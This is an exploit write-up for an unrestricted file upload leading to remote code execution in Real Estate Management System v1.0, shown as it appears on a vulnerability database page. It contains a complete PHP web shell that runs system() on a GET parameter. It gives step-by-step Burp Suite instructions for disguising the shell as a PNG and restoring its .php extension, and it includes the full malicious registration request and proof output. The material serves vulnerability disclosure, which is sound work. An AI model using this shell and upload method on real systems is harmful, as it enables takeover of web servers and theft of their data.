Vulners
Lucene search
Real Estate Management System v1.0 - Remote Code Execution via File Upload
# Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload
# Date: 2/11/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://codeastro.com
# Version: V1.0
# Tested on: Windows 11 + XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3
## Description ##
This Vulnerability allow the attacker to execute command injection payloads and upload malicious file into web server .
-----------------------------------------------------------------------------------------------------------------------
## Simple RCE Payload : ##
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system_payload($_GET['cmd']);
}
?>
</pre>
</body>
</html>
-----------------------------------------------------------------------------------------------------------------------
## Steps to Reproduce ##
1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking at Intercept is off .
2- Open The Browser From Proxy Tab Then Open The Resgister Web Page : http://localhost:8080/realestate/register.php
3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename .
4- Change The Filename extension into avatar.png , after save the RCE PHP Script .
5- Click Chose File From User Image Section Then Upload Your avatar.png file .
6- Click Register Then Back to Burp Suite Proxy Tab :
7- Modify File Extension Into Orginal File Extension that is : avatar.php in Example : Content-Disposition: form-data; name="uimage"; filename="avatar.png"
Content-Type: image/png .
8- After Modify The Content-Disposition From Burp Suite Proxy Tab Into Orginal File Extension Click Forward Button .
9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password .
10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .!
-----------------------------------------------------------------------------------------------------------------------
## Burp Request : ##
POST /realestate/register.php HTTP/1.1
Host: localhost
Content-Length: 1100
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/realestate/register.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="name"
johnhamosh
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="email"
[email protected]
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="phone"
+199988764
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="pass"
<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="utype"
user
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="uimage"; filename="avatar.php"
Content-Type: image/png
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="reg"
Register
------WebKitFormBoundarypgW90eleiRxRzcEK--
-----------------------------------------------------------------------------------------------------------------------
## PoC Simple RCE Through This Vulnerability : ##
Directory of C:\xampp\htdocs\realestate\admin\user
..
02/11/2024 08:09 PM 315 avatar.php
02/11/2024 08:04 PM 315 avatar.png
02/11/2024 06:54 PM 9,376 avatarm2-min.jpg
02/11/2024 06:54 PM 13,186 avatarm7-min.jpg
02/11/2024 07:47 PM 1,814 avatars.php
02/11/2024 06:54 PM 1,313 gr7.png
02/11/2024 07:36 PM 28 poc.php
-----------------------------------------------------------------------------------------------------------------------
## Video PoC : ##
1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4
2- https://gofile.io/d/AEWEgI
-----------------------------------------------------------------------------------------------------------------------
Greetz !Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4